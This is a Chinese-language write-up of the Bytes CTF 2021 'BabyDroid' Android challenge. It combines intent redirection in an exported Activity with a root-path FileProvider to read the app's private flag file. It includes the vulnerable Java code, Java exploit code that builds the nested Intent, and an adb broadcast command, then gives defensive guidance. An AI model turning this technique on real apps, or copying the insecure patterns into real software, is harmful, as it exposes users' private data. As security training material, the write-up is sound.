Bytes CTF 2021 BabyDroid漏洞分析与复现<\/h1>

漏洞概述<\/h2>

BabyDroid是一个Android应用程序，存在两个主要安全漏洞：<\/p>

Intent重定向漏洞<\/strong>：在Vulnerable Activity中，未经验证直接启动从Intent中获取的另一个Intent<\/li>

Grant Uri permission漏洞<\/strong>：通过FileProvider配置不当，结合Intent重定向可实现任意文件读取<\/li> <\/ol>
漏洞组件分析<\/h2>
AndroidManifest.xml分析<\/h3>
应用包含以下主要组件：<\/p>

两个Activity（其中Vulnerable Activity是导出的）<\/li>
一个Receiver（FlagReceiver）<\/li>
一个Provider（FileProvider）<\/li> <\/ul>
关键配置：<\/p>
<provider<\/span> <\/span><\/span> android:name=<\/span>"androidx.core.content.FileProvider"<\/span> <\/span><\/span> android:exported=<\/span>"false"<\/span> <\/span><\/span> android:authorities=<\/span>"androidx.core.content.FileProvider"<\/span> <\/span><\/span> android:grantUriPermissions=<\/span>"true"<\/span>><\/span> <\/span><\/span> <meta-data<\/span> <\/span><\/span> android:name=<\/span>"android.support.FILE_PROVIDER_PATHS"<\/span> <\/span><\/span> android:resource=<\/span>"@xml\/file_paths"<\/span>\/><\/span> <\/span><\/span><\/provider><\/span> <\/span><\/span><\/code><\/pre>Vulnerable Activity分析<\/h3> public<\/span> class<\/span> Vulnerable<\/span> extends<\/span> Activity {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> void<\/span> onCreate<\/span>(<\/span>Bundle savedInstanceState)<\/span> {<\/span> <\/span><\/span> super<\/span>.<\/span>onCreate<\/span>(<\/span>savedInstanceState);<\/span> <\/span><\/span> Intent intent =<\/span> (<\/span>Intent)<\/span> getIntent().<\/span>getParcelableExtra<\/span>(<\/span>"intent"<\/span>);<\/span> <\/span><\/span> startActivity(<\/span>intent);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>漏洞点：直接从Intent中获取并启动另一个Intent，未做任何验证，导致Intent重定向漏洞。<\/p> FlagReceiver分析<\/h3> public<\/span> class<\/span> FlagReceiver<\/span> extends<\/span> BroadcastReceiver {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> onReceive<\/span>(<\/span>Context context,<\/span> Intent intent)<\/span> {<\/span> <\/span><\/span> String flag =<\/span> intent.<\/span>getStringExtra<\/span>(<\/span>"flag"<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>flag !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> File file =<\/span> new<\/span> File(<\/span>context.<\/span>getFilesDir<\/span>(),<\/span> "flag"<\/span>);<\/span> <\/span><\/span> writeFile(<\/span>file,<\/span> flag);<\/span> <\/span><\/span> Log.<\/span>e<\/span>(<\/span>"FlagReceiver"<\/span>,<\/span> "received flag."<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 文件写入方法省略... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>功能：接收广播并将flag写入应用私有目录。<\/p> FileProvider配置<\/h3> file_paths.xml<\/code>配置：<\/p> <paths><\/span> <\/span><\/span> <root-path<\/span> <\/span><\/span> name=<\/span>"root"<\/span> <\/span><\/span> path=<\/span>""<\/span>\/><\/span> <\/span><\/span><\/paths><\/span> <\/span><\/span><\/code><\/pre>危险配置：允许从根目录开始的文件访问，结合grantUriPermissions="true"<\/code>，可能导致任意文件读取。<\/p> 攻击思路<\/h2> 利用Intent重定向<\/strong>：通过Vulnerable Activity转发我们构造的恶意Intent<\/li> 结合FileProvider<\/strong>：在转发的Intent中设置FLAG_GRANT_READ_URI_PERMISSION<\/code>标志，获取目标应用私有文件的访问权限<\/li> <\/ol> 关键步骤：<\/p> 构造嵌套Intent，外层Intent用于启动Vulnerable Activity，内层Intent用于访问FileProvider<\/li> 在内层Intent中设置URI指向目标文件（如flag文件）<\/li> 通过Vulnerable Activity以目标应用身份启动我们的恶意Intent，获取文件访问权限<\/li> <\/ol> 漏洞利用代码示例<\/h2> \/\/ 构造内层Intent，用于访问FileProvider <\/span><\/span><\/span><\/span>Intent innerIntent =<\/span> new<\/span> Intent();<\/span> <\/span><\/span>innerIntent.<\/span>addFlags<\/span>(<\/span>Intent.<\/span>FLAG_GRANT_READ_URI_PERMISSION<\/span>);<\/span> <\/span><\/span>innerIntent.<\/span>setData<\/span>(<\/span>Uri.<\/span>parse<\/span>(<\/span>"content:\/\/androidx.core.content.FileProvider\/root\/data\/data\/com.bytectf.babydroid\/files\/flag"<\/span>));<\/span> <\/span><\/span> <\/span><\/span>\/\/ 构造外层Intent，用于启动Vulnerable Activity并携带内层Intent <\/span><\/span><\/span><\/span>Intent outerIntent =<\/span> new<\/span> Intent();<\/span> <\/span><\/span>outerIntent.<\/span>setClassName<\/span>(<\/span>"com.bytectf.babydroid"<\/span>,<\/span> "com.bytectf.babydroid.Vulnerable"<\/span>);<\/span> <\/span><\/span>outerIntent.<\/span>putExtra<\/span>(<\/span>"intent"<\/span>,<\/span> innerIntent);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 启动攻击 <\/span><\/span><\/span><\/span>startActivity(<\/span>outerIntent);<\/span> <\/span><\/span><\/code><\/pre>完整攻击流程<\/h2> 在目标设备上安装存在漏洞的应用（victim.apk）<\/li> 使用root权限通过adb发送广播写入flag文件： am broadcast -W -a com.bytectf.SET_FLAG -n com.bytectf.babydroid\/.FlagReceiver -e flag flag{<\/span>this_is_test_flag}<\/span> <\/span><\/span><\/code><\/pre><\/li> 安装攻击应用（attack.apk）并执行攻击代码<\/li> 攻击应用将获取到flag文件内容<\/li> <\/ol> 防御措施<\/h2> 避免Intent重定向<\/strong>：<\/p> 不要直接启动从Intent中获取的另一个Intent<\/li> 如果需要转发Intent，应明确验证目标组件是否允许被启动<\/li> <\/ul> <\/li> 安全配置FileProvider<\/strong>：<\/p> 限制可访问的路径范围，避免使用<root-path><\/code><\/li> 仅在必要时设置grantUriPermissions="true"<\/code><\/li> 为FileProvider使用自定义的authorities，避免使用通用名称<\/li> <\/ul> <\/li> 最小权限原则<\/strong>：<\/p> 仅导出必要的组件<\/li> 对导出的组件进行严格的输入验证<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> BabyDroid漏洞展示了Android应用中两个常见问题的组合利用：<\/p> 不安全的Intent处理导致的Intent重定向<\/li> FileProvider配置不当导致的任意文件读取<\/li> <\/ol> 通过这两个漏洞的组合，攻击者可以读取目标应用的私有文件，获取敏感信息。开发者应重视组件安全配置和Intent处理的安全性。<\/p>